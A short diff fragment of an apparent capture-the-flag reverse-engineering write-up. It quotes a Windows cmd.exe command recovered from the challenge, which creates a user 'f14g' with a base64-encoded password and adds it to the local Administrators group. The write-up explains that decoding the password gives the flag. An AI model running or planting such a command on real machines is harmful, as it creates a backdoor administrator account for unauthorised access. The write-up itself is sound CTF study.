warlocksmurf/localctf-writeups/rentas2024/rev.md

 cmd.exe /c net user f14g cEBzczEyMw== /ADD && net localgroup Administrators f14g /ADD
 ```

-It tries to add the user f14g to the local machine and add it to the Administrators group.
-Decode the base64 password for the flag.
+It tries to add the user `f14g` to the local machine and add it to the `Administrators` group.
+Decode the password with base64 for the flag.